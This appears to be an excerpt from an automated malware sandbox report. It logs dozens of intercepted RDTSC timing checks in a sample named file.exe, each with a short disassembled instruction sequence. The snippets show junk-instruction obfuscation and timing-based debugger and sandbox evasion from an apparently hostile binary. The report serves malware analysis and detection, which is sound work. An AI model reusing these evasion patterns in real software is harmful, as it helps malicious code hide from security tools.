              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D774 second address: 83D788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A0813DAFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D8E3 second address: 83D8ED instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE8A076DDCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83DA52 second address: 83DA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FE8A0813DA6h 0x0000000c jmp 00007FE8A0813DB5h 0x00000011 popad 0x00000012 pushad 0x00000013 jne 00007FE8A0813DA6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b jmp 00007FE8A0813DB8h 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83DA96 second address: 83DA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83DA9C second address: 83DAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841477 second address: 8414CD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE8A076DDD5h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007FE8A076DDD9h 0x00000012 jmp 00007FE8A076DDD3h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007FE8A076DDD5h 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 pushad 0x00000024 push eax 0x00000025 pop eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8414CD second address: 8414E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8414E0 second address: 8414E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8414E6 second address: 8414EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84190B second address: 841911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841AE4 second address: 841AEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841AEA second address: 841AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841CC2 second address: 841CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8420CF second address: 8420EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8420EA second address: 842107 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A0813DA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE8A0813DAEh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 842107 second address: 84210E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840EC1 second address: 840ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE8A0813DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840ECB second address: 840ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8011A3 second address: 8011BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FE8A0813DA6h 0x00000013 jns 00007FE8A0813DA6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8011BC second address: 8011C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E2B5 second address: 87E2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E2B9 second address: 87E300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE8A076DDCCh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FE8A076DDDDh 0x00000018 jmp 00007FE8A076DDD1h 0x0000001d jno 00007FE8A076DDC6h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E300 second address: 87E31B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE8A0813DA6h 0x00000008 jmp 00007FE8A0813DB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E494 second address: 87E49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E49B second address: 87E4A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A0813DB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882C38 second address: 882C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD1h 0x00000009 pop ebx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B351 second address: 88B363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE8A0813DACh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B93B second address: 88B940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B940 second address: 88B948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BD73 second address: 88BD77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1DB second address: 88C1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1E1 second address: 88C1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C1E5 second address: 88C205 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE8A0813DA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE8A0813DADh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C205 second address: 88C219 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FE8A076DDC6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C219 second address: 88C21D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88C343 second address: 88C35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A076DDD1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 891842 second address: 891849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89876F second address: 898773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 898773 second address: 898777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89713D second address: 897148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FE8A076DDC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89744B second address: 89746C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE8A0813DB6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89781B second address: 897827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897827 second address: 897842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE8A0813DACh 0x0000000e jne 00007FE8A0813DA6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897842 second address: 897848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840987 second address: 8409B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE8A0813DB6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8409B3 second address: 840A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE8A076DDD1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov edx, 0F25895Ah 0x00000013 mov ebx, dword ptr [ebp+12483AA4h] 0x00000019 mov dword ptr [ebp+122D18DCh], edx 0x0000001f add eax, ebx 0x00000021 push ebx 0x00000022 mov ecx, dword ptr [ebp+122D35B2h] 0x00000028 pop edx 0x00000029 mov dword ptr [ebp+122D2AB9h], esi 0x0000002f push eax 0x00000030 pushad 0x00000031 jns 00007FE8A076DDCCh 0x00000037 jmp 00007FE8A076DDCFh 0x0000003c popad 0x0000003d mov dword ptr [esp], eax 0x00000040 push 00000000h 0x00000042 push edx 0x00000043 call 00007FE8A076DDC8h 0x00000048 pop edx 0x00000049 mov dword ptr [esp+04h], edx 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edx 0x00000056 push edx 0x00000057 ret 0x00000058 pop edx 0x00000059 ret 0x0000005a mov edi, dword ptr [ebp+122D35DFh] 0x00000060 push 00000004h 0x00000062 nop 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FE8A076DDD4h 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840A4E second address: 840A71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FE8A0813DA8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840A71 second address: 840A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8979D1 second address: 8979D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89D344 second address: 89D34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C84B second address: 89C851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C851 second address: 89C855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C991 second address: 89C997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C997 second address: 89C9BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FE8A076DDD0h 0x00000008 jmp 00007FE8A076DDCCh 0x0000000d pop edi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CDC0 second address: 89CDD8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FE8A0813DB1h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89CF1E second address: 89CF24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A10A2 second address: 8A10DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE8A0813DADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007FE8A0813DBDh 0x00000011 pushad 0x00000012 jnp 00007FE8A0813DA6h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A10DD second address: 8A10EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FE8A076DDD2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A10EA second address: 8A10F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9CAB second address: 8A9CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FE8A076DDC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9CB6 second address: 8A9CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB6h 0x00000009 popad 0x0000000a jmp 00007FE8A0813DB7h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007FE8A0813DACh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7E73 second address: 8A7E8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A82B6 second address: 8A82DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DB7h 0x00000007 js 00007FE8A0813DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A861F second address: 8A8623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8623 second address: 8A863A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A863A second address: 8A8645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8645 second address: 8A864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A864B second address: 8A8650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8977 second address: 8A898A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A898A second address: 8A89C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FE8A076DDC6h 0x0000000d js 00007FE8A076DDC6h 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FE8A076DDD0h 0x0000001a jns 00007FE8A076DDC6h 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 jnl 00007FE8A076DDC8h 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A8C75 second address: 8A8C8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE8A0813DADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9482 second address: 8A9486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A9486 second address: 8A94C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE8A0813DB0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c jng 00007FE8A0813DC8h 0x00000012 pushad 0x00000013 jmp 00007FE8A0813DB4h 0x00000018 jl 00007FE8A0813DA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BB9 second address: 8B1BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1D13 second address: 8B1D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE8A0813DA6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E3C second address: 8B1E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E42 second address: 8B1E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E46 second address: 8B1E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FE8A076DDD2h 0x0000000c jo 00007FE8A076DDC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E5A second address: 8B1E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E5E second address: 8B1E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E64 second address: 8B1E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E68 second address: 8B1E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FE8A076DDC6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E7A second address: 8B1E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E80 second address: 8B1E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007FE8A076DDF4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2163 second address: 8B2177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FE8A0813DA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BAD6A second address: 8BAD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8EC1 second address: 8B8EDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE8A0813DACh 0x00000008 jns 00007FE8A0813DA6h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9353 second address: 8B9359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9783 second address: 8B9787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9787 second address: 8B97BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FE8A076DDCDh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FE8A076DDD8h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B97BC second address: 8B97E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jc 00007FE8A0813DA6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE8A0813DB9h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B97E3 second address: 8B97E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A4C second address: 8B9A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FE8A0813DA6h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A5D second address: 8B9A61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B9A61 second address: 8B9A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
